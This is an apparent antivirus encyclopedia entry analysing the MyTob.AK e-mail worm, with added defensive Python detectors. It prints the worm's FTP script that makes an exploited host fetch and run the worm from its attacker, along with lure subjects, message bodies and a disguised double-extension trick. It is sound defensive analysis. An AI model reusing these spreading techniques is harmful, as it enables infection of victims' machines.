Threat Encyclopedia


MyTob.AK is a typical mass-mailing e-mail worm. The file is approximately 76,000 bytes in size and is runtime-compressed with eXpressor, a Romanian executable runtime protector.

Installation and Autostart Techniques

Upon execution, the worm copies itself into the System32 folder as "666.exe". It also drops a component, 666.EXE (8192 bytes in size), in the root directory, which is usually C:\. This dropped component is runtime-compressed with UPX and is detected by NOD32 as W32/Mytob.P (the MSN Messenger spreading component).

MyTob.AK also creates copies of itself directly in the root directory:

"eminem vs 2pac.scr"
"photo album.scr"
"funny pic .scr"

Note: The worm sets the 'read only' and 'hidden' attributes on these files, including the original file from which the worm was started.

The worm adds the following registry value under three autostart keys, so that it runs every time Windows is started:

"Windows USB Service" = "666.exe" 

"Windows USB Service" = "666.exe"  

"Windows USB Service" = "666.exe"

MyTob.AK also writes the same value under four further registry keys:

"Windows USB Service" = "666.exe"

"Windows USB Service" = "666.exe"

"Windows USB Service" = "666.exe"

"Windows USB Service" = "666.exe"

Note: The worm continuously watches for these registry entries and recreates them if they are removed. When cleaning a machine, terminate the worm process (and unload its rootkit driver, see below) before deleting the entries; otherwise they reappear immediately.

Rootkit functionality

MyTob.AK drops and executes "winsystem.exe", 19533 bytes in size, in the root directory. This file is FSG-packed, is detected by NOD32 as "W32/Mytob.W", and is a rootkit dropper: it installs the "msdirectx.sys" driver, which hides the worm's processes (see screenshot 1).
The rootkit consists of a device driver and a usermode application; together they can hide processes, change the privileges of a process or thread, and so on. It works on Windows NT/2000/XP.
The interface between ring 3 (usermode) and ring 0 (kernelmode) is implemented through IOCTL commands defined in the device driver code. It would be easy to extend the interface with further functionality.

Are we lost? Not yet. The rootkit hides the process, but netstat still shows the worm's network activity (666.exe):

The worm creates a mutex named "H-E-L-L-B-O-T-3-BY-DIABLO" so that only one instance of the worm runs on a machine.

E-mail harvesting

The worm scans all fixed disks and collects e-mail addresses from files whose extension matches one of the following:

*.wab, *.adb, *.tbb, *.dbx, *.asp, *.php, *.sht, *.htm, *.pl

In practice, however, this extension list is largely ineffective, because the worm has a bug in the way it concatenates and compares the file names returned in WIN32_FIND_DATA. The effect: the worm opens and scans a file for e-mail addresses as soon as its extension matches one or more consecutive characters of an entry in the list. In technical terms, the extension is compared with a substring ('instring') function rather than checked for an exact match.

Example: the worm will search for e-mail addresses not only in *.htm files but also in files with the extensions *.ht or *.h.
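The following Python snippet models the comparison bug described above. It is an added example, not code from the worm or from the vendor: the substring check is reconstructed from the description, the handling of files without an extension is an assumption, and the directory listing is constructed.

```python
# Added example modelling the broken extension check described above. It is
# not the worm's code: the substring comparison is reconstructed from the
# description, and treatment of files with no extension is an assumption.

# The harvesting extension list exactly as the write-up gives it.
HARVEST_EXTENSIONS = "*.wab, *.adb, *.tbb, *.dbx, *.asp, *.php, *.sht, *.htm, *.pl"
_LISTED = [entry.strip()[1:] for entry in HARVEST_EXTENSIONS.split(",")]  # ".wab", ".adb", ...


def extension_of(filename):
    """Return the extension including its dot, lower-cased ('' if none)."""
    dot = filename.rfind(".")
    return "" if dot == -1 else filename[dot:].lower()


def buggy_match(filename):
    """The behaviour the write-up describes: a file is scanned whenever its
    extension occurs as a substring of any listed extension, so '.h', '.ht',
    '.a' or '.s' pass just like '.htm'. Files without an extension are
    skipped here (assumption: the write-up does not say how they are handled)."""
    ext = extension_of(filename)
    if not ext:
        return False
    return any(ext in listed for listed in _LISTED)


def intended_match(filename):
    """What the list was presumably meant to do: an exact extension match."""
    return extension_of(filename) in _LISTED


def overscanned(filenames):
    """Files the buggy check opens although the intended check would not."""
    return [f for f in filenames if buggy_match(f) and not intended_match(f)]


# Constructed directory listing (not taken from a real system).
SAMPLE_LISTING = ["contacts.wab", "index.htm", "stdio.h", "report.ht",
                  "archive.a", "notes.txt", "README", "page.php"]

if __name__ == "__main__":
    for name in SAMPLE_LISTING:
        print(f"{name:14} buggy={buggy_match(name)!s:5} intended={intended_match(name)}")
    print("over-scanned:", overscanned(SAMPLE_LISTING))
```

For an incident responder the practical consequence is that a far wider set of files than the listed ones is read by the worm, so file-access telemetry around 666.exe will show it touching source files and other short-extension files, not only mailboxes and web pages.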

Note: MyTob.AK also collects e-mail addresses from the Windows Address Book and from the following folders:

%Windir%\Temporary Internet Files
%Userprofile%\Local Settings\Temporary Internet Files

DNS resolving

The worm performs DNS MX (mail exchange) queries to find a suitable mail server for each domain it tries to send itself to. If the MX query for a domain fails, the worm guesses the mail server by prepending the following prefixes to the domain name:

gate. mx. mail. smtp. mx1. mxs. mail1. relay. ns.
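The lookup order above, reproduced as an added Python example (not the worm's code) against a constructed DNS table built from reserved documentation names. The `mx_lookup` and `host_exists` callbacks are assumptions standing in for real resolver calls so that the logic runs offline.

```python
# Added example, not the worm's code: it reproduces the mail-server lookup
# order the write-up describes (MX answer first, then the prefix guesses)
# against a constructed DNS table, so the resulting query pattern can be seen
# without touching the network.

# Prefixes in the order the write-up lists them.
MX_GUESS_PREFIXES = ["gate", "mx", "mail", "smtp", "mx1", "mxs", "mail1", "relay", "ns"]


def candidate_mail_hosts(domain, mx_lookup):
    """Hosts tried for `domain`, in order: the MX records if the lookup
    succeeds, otherwise prefix.domain for every guess prefix."""
    mx_hosts = mx_lookup(domain)
    if mx_hosts:
        return list(mx_hosts)
    return [f"{prefix}.{domain}" for prefix in MX_GUESS_PREFIXES]


def pick_mail_host(domain, mx_lookup, host_exists):
    """First candidate that resolves, or None. `mx_lookup(domain)` returns a
    list of MX hosts (empty on failure) and `host_exists(name)` reports whether
    an address record exists; both are injected so the logic runs offline."""
    for host in candidate_mail_hosts(domain, mx_lookup):
        if host_exists(host):
            return host
    return None


# Constructed DNS data using reserved documentation names (not real records).
FAKE_MX = {"example.com": ["mx1.example.com", "mx2.example.com"]}
FAKE_A = {"mx1.example.com", "mx2.example.com", "smtp.example.org", "www.example.net"}


def queries_for(domain):
    """Address lookups an observer would see for `domain` under the fake
    table: the shape to look for in DNS logs."""
    seen = []

    def a_lookup(name):
        seen.append(name)
        return name in FAKE_A

    pick_mail_host(domain, lambda d: FAKE_MX.get(d, []), a_lookup)
    return seen


if __name__ == "__main__":
    for d in ("example.com", "example.org", "example.net"):
        chosen = pick_mail_host(d, lambda x: FAKE_MX.get(x, []), FAKE_A.__contains__)
        print(d, "->", chosen, queries_for(d))
```

A defender watching DNS logs can recognise the same shape from the other side: for each destination domain one MX query, then A queries for gate., mx., mail., smtp. and so on in exactly that order until one resolves, repeated across many unrelated domains from a single workstation.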

E-mail Sender

The worm generates the sender's e-mail addresses using the following list of names:

adam, alex, alice, andrew, anna, bill, bob, brenda, brent, brian, britney, bush, claudia, dan, dave, david, debby, fred, george, helen, jack, james, jane, jerry, jim, jimmy, joe, john, jose, julie, kevin, leo, linda, lolita, madmax, maria, mary, matt, michael, mike, peter, ray, robert, sam, sandra, serg, smith, stan, steve, ted, tom

to which it appends a randomly chosen domain name (the domain names are stored in encrypted form inside the worm):

It uses its own SMTP (Simple Mail Transfer Protocol) engine to mass-mail copies of itself to other e-mail addresses.

E-mail subjects

MyTob.AK randomly selects an e-mail subject from the following list:

Server Report
Mail Transaction Failed
Mail Delivery System
Good day

Note: The e-mail subjects are stored in encrypted form inside the worm.

Message Body

The e-mail contains one of the following message texts:

Mail transaction failed. Partial message is available.
The message contains Unicode characters and has been sent as a binary attachment.
The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.
The original message was included as an attachment.
Here are your banks documents.

Note: The worm may also send e-mails containing a blank message body or random strings.

E-mail Attachments

The worm attaches one of the following file names with a self-copy:


with one of the following file extensions:


The worm may also attach itself as a ZIP file. The file inside the ZIP archive may have two extensions, the first chosen from the following list:


The second extension is chosen from the following list and is separated from the first by a long run of spaces, so that the executable extension is pushed out of view:


Example: attachment "" may contain the file "text.txt { spaces }.scr"
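An added Python triage check, not the vendor's or the worm's code, that flags a message showing the lure described above: a listed subject, a listed body text, and an attachment (or ZIP member) whose name carries a harmless first extension, a run of spaces, and an executable extension. Because the file-name and extension lists are not preserved on this page, the EXEC_EXTENSIONS tuple goes beyond the page's ".scr" example and is an assumption; the sample messages are constructed, not real captures.

```python
# Added example, not the worm's or the vendor's code: a small mail-triage
# check that recognises the lure described above (subjects, body texts and a
# doubled extension padded with spaces, possibly inside a ZIP). The file-name
# and extension lists are not preserved on this page, so EXEC_EXTENSIONS is an
# assumption beyond the page's ".scr" example, and the sample messages are
# constructed here, not real captures.
import io
import re
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage

WORM_SUBJECTS = {"Server Report", "Mail Transaction Failed", "Mail Delivery System", "Good day"}
WORM_BODY_PHRASES = (
    "Mail transaction failed. Partial message is available.",
    "The message contains Unicode characters and has been sent as a binary attachment.",
    "The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.",
    "The original message was included as an attachment.",
    "Here are your banks documents.",
)
EXEC_EXTENSIONS = (".scr", ".exe", ".pif", ".bat", ".cmd")  # ".scr" from the page; the rest assumed
# "text.txt<many spaces>.scr": harmless first extension, whitespace run, executable extension.
PADDED_DOUBLE_EXT = re.compile(r"\.\w{1,4}\s{4,}\.(scr|exe|pif|bat|cmd)$", re.IGNORECASE)


def attachment_names(msg):
    """Attachment file names, plus the member names of any ZIP attachment."""
    names = []
    for part in msg.iter_attachments():
        names.append(part.get_filename() or "")
        payload = part.get_payload(decode=True) or b""
        if payload.startswith(b"PK"):  # ZIP local-file header signature
            try:
                with zipfile.ZipFile(io.BytesIO(payload)) as archive:
                    names.extend(archive.namelist())
            except zipfile.BadZipFile:
                pass
    return names


def classify(raw_message):
    """Return the list of indicators matched by one RFC 5322 message (bytes)."""
    msg = message_from_bytes(raw_message, policy=policy.default)
    reasons = []
    if (msg["Subject"] or "").strip() in WORM_SUBJECTS:
        reasons.append("subject")
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body is not None else ""
    if any(phrase in text for phrase in WORM_BODY_PHRASES):
        reasons.append("body")
    for name in attachment_names(msg):
        if PADDED_DOUBLE_EXT.search(name) or name.lower().endswith(EXEC_EXTENSIONS):
            reasons.append("attachment:" + name)
    return reasons


def build_sample():
    """Constructed message shaped like the lure: listed subject and body, and a
    ZIP attachment whose member is 'text.txt', 60 spaces, '.scr'."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("text.txt" + " " * 60 + ".scr", b"MZ" + b"\0" * 62)
    msg = EmailMessage()
    msg["From"] = "bob@example.com"
    msg["To"] = "alice@example.net"
    msg["Subject"] = "Mail Transaction Failed"
    msg.set_content("Mail transaction failed. Partial message is available.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="document.zip")
    return msg.as_bytes()


def build_benign():
    """Constructed ordinary message for comparison."""
    msg = EmailMessage()
    msg["From"] = "bob@example.com"
    msg["To"] = "alice@example.net"
    msg["Subject"] = "Lunch on Friday?"
    msg.set_content("Same place as last time.")
    return msg.as_bytes()


if __name__ == "__main__":
    print("lure:  ", classify(build_sample()))
    print("benign:", classify(build_benign()))
```

The whitespace-padding rule is the one worth keeping even after the subject and body strings have gone stale: a legitimate file name has no reason to contain a run of spaces between two extensions, and looking inside ZIP attachments is what catches the case the write-up describes.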

The worm avoids e-mail addresses that contain any of the following strings:

.gov, .mil, abuse, accoun, acketst, admin, anyone, arin., avp, be_loyal:, berkeley, borlan, bsd, bugs, certific, contact, example, fcnz, feste, fido, foo., fsf., gnu, gold-certs, google, gov., help, hotmail, iana,, icrosof, icrosoft, ietf, info, inpris, isc.o, isi.e, kernel, linux, listserv, math, mit.e, mozilla, msn., mydomai, nobody, nodomai, noone, not, nothing, ntivi, page, panda, pgp, postmaster, privacy, rating, rfc-ed, ripe., root, ruslis, samples, secur, sendmail, service, site, soft, somebody, someone, sopho, spm, submit, support, syma, tanford.e, the.bat, unix, usenet, utgers.ed, webmaster, www, you, your, -._!, -._!@

Note: Several entries deliberately omit their first character so that the comparison covers both capitalisations; "icrosof", for instance, matches "Microsoft" as well as "microsoft".


Hostfile Manipulation

It overwrites the existing hosts file with the following data so that these sites can no longer be reached:

Exploiting technologies

The worm generates random IP addresses and attempts to connect to TCP port 445 of each generated address in order to exploit the LSASS buffer overflow vulnerability [see MS04-011]. If the exploit succeeds, the shellcode executed on the target machine instructs it to connect back to the attacking system and retrieve a copy of the worm. The copy is transferred over an FTP connection to the attacking system, driven by the FTP command file rox.txt.

The worm also takes advantage of the DCOM RPC vulnerability [see MS03-026] for spreading.

The rox.txt file contains the following ftp commands:

open %IP% %TCP port%
user hell rulez
get owned.exe

The compromised system runs FTP.EXE locally with this script to retrieve a copy of the worm, named "owned.exe", from the system that attacked it, and executes the file once the download completes.
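An added Python parser (not the worm's code) for FTP command scripts shaped like rox.txt, useful when such a script is recovered from a compromised host: it extracts the callback host, port, credentials and fetched file names. The reading of "user hell rulez" as a user name followed by a password follows the syntax of ftp.exe's `user` command; the second sample script, with a 192.0.2.x address, is constructed.

```python
# Added example, not the worm's code: a parser for FTP command scripts of the
# kind shown above (rox.txt), to pull the callback host, port, credentials
# and fetched file names out of a recovered script during triage. The second
# sample script is constructed with a documentation address, not a real one.
FETCH_VERBS = {"get", "recv", "mget"}


def parse_ftp_script(text):
    """Parse an ftp.exe-style command script into a dict. Tokens are kept
    verbatim (placeholders such as %IP% are not expanded); `port` is an int
    only when the token is numeric, otherwise the raw token."""
    info = {"host": None, "port": None, "user": None, "password": None,
            "files": [], "other": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        verb, *args = line.split()
        verb = verb.lower()
        if verb == "open" and args:
            info["host"] = args[0]
            if len(args) > 1:
                port = " ".join(args[1:])  # '%TCP port%' arrives as two tokens
                info["port"] = int(port) if port.isdigit() else port
            else:
                info["port"] = 21
        elif verb == "user" and args:
            # ftp.exe 'user' takes the user name and, optionally, the password.
            info["user"] = args[0]
            info["password"] = args[1] if len(args) > 1 else None
        elif verb in FETCH_VERBS and args:
            info["files"].extend(args)
        else:
            info["other"].append(line)
    return info


def looks_like_download_stager(info):
    """Open + login + fetch of an executable: the shape of the script above."""
    return (info["host"] is not None and info["user"] is not None
            and any(f.lower().endswith((".exe", ".scr", ".dll")) for f in info["files"]))


# The script as reproduced in the write-up, placeholders included.
ROX_TXT = """open %IP% %TCP port%
user hell rulez
get owned.exe
"""

# Constructed variant with concrete values (192.0.2.0/24 is a documentation range).
SAMPLE_TXT = """open 192.0.2.10 4242
user hell rulez
binary
get owned.exe
quit
"""

if __name__ == "__main__":
    for script in (ROX_TXT, SAMPLE_TXT):
        parsed = parse_ftp_script(script)
        print(parsed, "stager" if looks_like_download_stager(parsed) else "not a stager")
```

The host and port recovered from such a script identify the infected peer that delivered the copy, which is the next machine to look at; the fixed user name and password are a cheap signature for network sensors watching FTP control channels.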


Other Details:

The worm also provides IRC-Backdoor functionality with the following functions:

Downloading files
Downloading new worm updates
Executing files
Providing uptime information to the remote controller
Providing information about the worm variant to the remote controller
Notifying IRC Channels/Operator via private message
Restarting the computer

The worm connects to the following IRC servers:

The worm is able to send copies via MSN Messenger to all online contacts in the contact list.